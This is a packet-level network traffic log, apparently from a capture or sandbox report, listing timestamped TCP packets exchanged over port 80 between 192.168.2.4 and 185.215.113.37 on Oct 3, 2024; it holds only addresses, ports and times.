Oct 3, 2024 18:38:13.753401995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.753426075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.753434896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.753473043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.755454063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.755539894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.775784969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.775861979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.775985956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.776022911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.776036024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.776071072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.776501894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.776535988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.776562929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.776571035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.776585102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.776609898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.776613951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.776657104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.777148962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.777182102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.777204037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.777218103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.777230978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.777251959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.777264118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.777290106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.777297020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.777335882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.777899027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.777930975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.777951002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.777966022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.777976036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.778000116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.778009892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.778036118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.778047085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.778074980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.778079033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.778124094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.778820038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.778853893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.778867960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.778889894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.778901100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.778925896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.778935909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.778960943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.778970957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.779006958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.779863119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.779898882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.779917955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.779932022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.779946089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.779968977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.779975891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.780004025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.780019999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.780051947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.780512094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.780545950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.780561924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.780580044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.780591011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.780615091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.780625105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.780651093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.780658960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.780694962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.781368971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.781403065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.781418085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.781438112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.781450987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.781475067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.781483889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.781507969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.781521082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.781543016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.781553984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.781577110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.781594038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.781620979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.782399893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.782434940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.782459974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.782466888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.782489061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.782519102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.782551050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.782583952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.782586098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.782610893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.782610893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.782635927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.783442974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.783535957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.783555031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.783570051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.783582926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.783605099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.783617020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.783638954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.783649921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.783675909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.783683062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.783720970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.784250975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.784284115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.784298897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.784318924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.784332991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.784353971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.784364939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.784387112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.784399986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.784423113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.784431934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.784456015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.784466028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.784498930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.785120964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.785155058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.785177946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.785187960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.785202980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.785223007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.785234928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.785257101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.785270929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.785291910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.785305023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.785321951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.785341978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.785356045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.785373926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.785403967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.786040068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.786073923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.786091089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.786108971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.786125898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.786142111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.786155939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.786175013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.786189079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.786227942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.808576107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.808631897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.808681965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.808697939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.808731079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.808751106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.809030056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.809045076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.809061050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.809077978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.809092999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.809103012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.809494972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.809509993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.809540033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.809556007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.809636116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.809659958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.809674978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.809679031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.809690952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.809701920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.809710979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.809736013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.810184956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.810199976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.810214996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.810229063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.810260057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.810260057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.810260057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.810278893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.810796976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.810812950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.810827017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.810842037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.810842037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.810853004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.810858011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.810874939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.810874939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.810894012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.810904026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.810914993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.811647892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.811664104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.811676979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.811691999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.811691999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.811708927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.811717987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.811748981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.811764956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.812509060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.812524080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.812539101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.812551022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.812555075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.812566042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.812571049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.812586069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.812587023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.812597036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.812613964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.812633991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.813411951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.813429117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.813443899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.813457012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.813472986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.813483000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.844228983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.844342947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.844392061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.844402075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.844419956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.844435930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.844450951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.844472885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.844480038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.844507933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.844520092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.844547033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.844554901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.844594002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.869329929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.869364977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.869386911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.869400024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.869410992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.869447947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.869468927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.869502068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.869513988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.869538069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.869546890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.869577885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.869581938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.869626045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.870094061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.870127916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.870148897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.870162964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.870181084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.870197058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.870203018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.870233059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.870243073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.870265961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.870292902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.870311022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.870775938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.870816946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.870831966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.870851994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.870867014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.870887995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.870899916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.870922089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.870934963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.870969057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.871674061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.871707916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.871727943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.871741056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.871756077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.871774912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.871783972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.871809959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.871819973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.871845961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.871857882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.871901989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.872550011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.872584105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.872606039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.872617960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.872631073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.872654915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.872667074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.872704029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.872952938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.872987032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.873008013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.873022079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.873034954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.873070002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.873289108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.873342037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.873382092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.873416901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.873431921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.873450994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.873472929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.873485088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.873493910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.873532057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.874249935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.874284029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.874304056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.874319077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.874330044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.874352932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.874367952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.874387026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.874399900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.874423027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.874434948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.874469995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.875283957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.875319958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.875338078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.875354052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.875369072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.875402927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.875408888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.875443935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.875457048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.875478983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.875490904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.875528097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.875766039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.875801086 CEST	80	49730	185.215.113.37	192.168.2.4
